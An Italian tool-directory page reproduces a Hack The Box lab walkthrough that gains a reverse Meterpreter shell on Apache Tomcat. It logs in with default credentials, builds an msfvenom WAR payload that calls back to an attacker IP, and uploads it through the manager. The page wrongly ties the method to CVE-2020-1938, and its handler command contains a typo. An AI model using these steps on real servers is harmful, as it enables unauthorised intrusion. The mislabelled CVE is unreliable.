Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2020-1938-Exploitation — Walkthrough passo-passo per sfruttare CVE-2020-1938 (upload arbitrario JSP di Apache Tomcat a RCE) usando msfvenom e Metasploit in un ambiente di laboratorio Hack The Box. | Kitploit
Strumenti/GitHubGitHub/hopsypopsy8/cve-2020-1938-exploitation
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneLab e Pratica
GitHubhopsypopsy8/cve-2020-1938-exploitation

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →

CVE-2020-1938-Exploitation

Walkthrough passo-passo per sfruttare CVE-2020-1938 (upload arbitrario JSP di Apache Tomcat a RCE) usando msfvenom e Metasploit in un ambiente di laboratorio Hack The Box.

Vedi Repository
31 anno faNon ancora revisionato
Condividi

CVE-2020-1938 Sfruttamento

Apache Tomcat: caricamento arbitrario di JSP che porta a RCE

Descrizione

CVE-2020-1938 è una vulnerabilità critica che colpisce Apache Tomcat dalla versione 9.0.0.M1 alla 9.0.0.30, dalla 8.5.0 alla 8.5.50 e dalla 7.0.0 alla 7.0.99 ⚠️ Questa è stata sfruttata in un lab di Hack The Box.

🔗 Riferimento: Voce NIST NVD

Ricognizione

Identificare un vettore d'attacco

immagine
  1. Il sito web ha credenziali predefinite per la funzionalità Server Status.

  2. Questa interfaccia indica che la versione è Apache Tomcat/7.0.88, con architettura a 64 bit.

  3. Da questa interfaccia navighiamo fino all'elenco delle applicazioni, che espone una funzionalità di di file .war.

Upload
  • Se il caricamento riesce, il file .war viene eseguito su /directory/filename

  • La ricerca sulla versione di Apache Tomcat ha confermato la vulnerabilità a CVE-2020-1938

  • Sfruttamento

  • Generazione del file .war

    root@kitploit:~
    msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.10.14.3 LPORT=3004 -f war -o exploit.war
    

    Usando msfvenom, che è un generatore di payload di Metasploit, generiamo il nostro payload exploit.war.

    1. -p windows/x64/meterpreter_reverse_tcp è il tipo di payload (nel nostro caso a 64 bit, come identificato in Server Status)
    2. LHOST=10.10.14.3 LPORT=3004 sono i dettagli della connessione inversa per la macchina dell'attaccante
    3. -f war è il tipo di file
    4. -o exploit.war nome del file di output

    Dopo la generazione del file, entra nel file e trova il nome del file .jsp, ad esempio gcvxdtmxvw.jsp, e salvalo per dopo.

    Configurazione di Metasploit

    root@kitploit:~
    msfconsole
    use exploit/multi/hanlder
    Set LHOST 10.10.14.3
    Set LPORT 3004
    

    Usando msfconsole impostiamo un listener che attende l'esecuzione del nostro payload.

    Caricamento ed esecuzione del file malevolo

    immagine
    immagine

    Carichiamo il nostro file nella sezione deploy, dopodiché aggiorniamo la schermata e scopriamo che il file è stato caricato con successo. Per completare l'exploit dobbiamo navigare al percorso ip/hacked/gcvxdtmxvw.jsp.

    immagine

    Questo blocca la richiesta, ma siamo in grado di vedere localmente sulla nostra macchina che abbiamo una connessione inversa.

    Scarica lo strumento